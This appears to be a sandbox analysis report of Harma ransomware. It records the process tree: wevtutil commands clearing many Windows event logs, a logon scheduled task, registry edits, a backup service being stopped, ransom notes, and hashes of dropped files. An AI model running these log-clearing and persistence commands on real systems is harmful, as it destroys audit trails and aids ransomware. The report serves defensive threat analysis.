C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WFP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WUSA/Debug"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Power"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Render"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WinRM/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"3⤵
- Clears Windows event logs
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ntshrui"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "OAlerts"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Security"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Setup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "System"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "TabletPC_InputPanel_Channel"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSetup"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "WMPSyncEngine"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Windows PowerShell"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"3⤵
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "muxencode"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y2⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\HRMPRIV1⤵
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HRMPRIV2⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk.id-32B7E671.[decryptioner@uncryptfile.com].HARMA1⤵
- Modifies registry class
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x7281⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\FILES ENCRYPTED.txt1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\FILES ENCRYPTED.txtFilesize
118B
MD522696a2ddcd33c292082b9dafcdd8af2
SHA11948a7f094c013e531ccc67dfaa5935d538fb6e9
SHA256ca2372ac6b1b80af08ebfb0e3f01a7c9e34f94591cc3fbdd6fec59000d2c8f44
SHA51282c4dddf8e2f5fa4933590bc45d66f5906832fbc4d2a559547a444023fecf3f1fbdd96dd62e3161a11178c5a0e7958600bc753da077c7378c41573d22b515c59
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD51957b0a95c68b57b56d1951399164568
SHA1a79624a7b25808685907f09f139a8c490e432f08
SHA256c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973
SHA5127efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD51957b0a95c68b57b56d1951399164568
SHA1a79624a7b25808685907f09f139a8c490e432f08
SHA256c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973
SHA5127efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD51957b0a95c68b57b56d1951399164568
SHA1a79624a7b25808685907f09f139a8c490e432f08
SHA256c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973
SHA5127efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92
-
C:\ProgramData\HRMPUBFilesize
292B
MD5d72ed62e6d972ceb042a10a0378cb37f
SHA1ba5d96c45f78de85ddf51cf6041320605cb7077a
SHA2564ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6
SHA5126ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb
-
C:\ProgramData\HRMPUBFilesize
292B
MD5d72ed62e6d972ceb042a10a0378cb37f
SHA1ba5d96c45f78de85ddf51cf6041320605cb7077a
SHA2564ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6
SHA5126ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb
-
C:\ProgramData\HRMPUBFilesize
292B
MD5d72ed62e6d972ceb042a10a0378cb37f
SHA1ba5d96c45f78de85ddf51cf6041320605cb7077a
SHA2564ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6
SHA5126ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\id.harmaFilesize
8B
MD569853ad62d7f47c9199d94538f0786b9
SHA1b37076c8805dbbaf9663d5ee887f530c95ecc26c
SHA256031c4ea40cc5d4e42bdac1387816fac4d1af1ac4044ff8169634c1a3f185171c
SHA5120dad2eca7f32c3ca184ccff9c5d7912cb695b05e1170e42997537b849fb98b3bac522edec09c32ce76ed84a7d66ca451179c2431f9ee749377eef87fc8d242d9
-
C:\Users\Admin\AppData\Local\Temp\HRMPRIVFilesize
2KB
MD51957b0a95c68b57b56d1951399164568
SHA1a79624a7b25808685907f09f139a8c490e432f08
SHA256c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973
SHA5127efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92
-
C:\Users\Admin\AppData\Local\Temp\HRMPUBFilesize
292B
MD5d72ed62e6d972ceb042a10a0378cb37f
SHA1ba5d96c45f78de85ddf51cf6041320605cb7077a
SHA2564ed11af279bf9d4c3b305550caab73561fe01fdf442c262bd52ee95a713401c6
SHA5126ac08ba04d487720609730e0828e4e4d75279a836f1bc9f97bdf2861c2b0b31bcc9564f215785ae41f69128f72ba7f080e5d25f45fae2cc91207da4e5e4541cb
-
C:\Users\Admin\AppData\Local\Temp\id.harmaFilesize
8B
MD569853ad62d7f47c9199d94538f0786b9
SHA1b37076c8805dbbaf9663d5ee887f530c95ecc26c
SHA256031c4ea40cc5d4e42bdac1387816fac4d1af1ac4044ff8169634c1a3f185171c
SHA5120dad2eca7f32c3ca184ccff9c5d7912cb695b05e1170e42997537b849fb98b3bac522edec09c32ce76ed84a7d66ca451179c2431f9ee749377eef87fc8d242d9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\Users\Admin\Desktop\HRMPRIVFilesize
2KB
MD51957b0a95c68b57b56d1951399164568
SHA1a79624a7b25808685907f09f139a8c490e432f08
SHA256c2eb61d6a64effa604370217ac25e24ee1de3ff312e8cdd6bd02375587351973
SHA5127efd0afb1feaff75da3e7170c1267104011ab8216a07cedf498f7ea6ce6bdd38a5e6aa3d2969d1ae12d719a732812b5804f30c976d2f036ce3f91cda109d4b92
-
C:\info.htaFilesize
12KB
MD558974f5eae5f6f7b8526f8d062f199a4
SHA1c60d299024d56b21366c410840a2600871367684
SHA2567175bc58942b269c629379180941f5633f1b237c9181601c193d5f3bc7ce3aa1
SHA512794683e2592049616eb12512280e7e0760ca0a222f8e80aa83501e31c4b335f6ec1ec8865c2142c7ca16453b6e0a5c3218b75dd7bf598789a4d1720077cf923d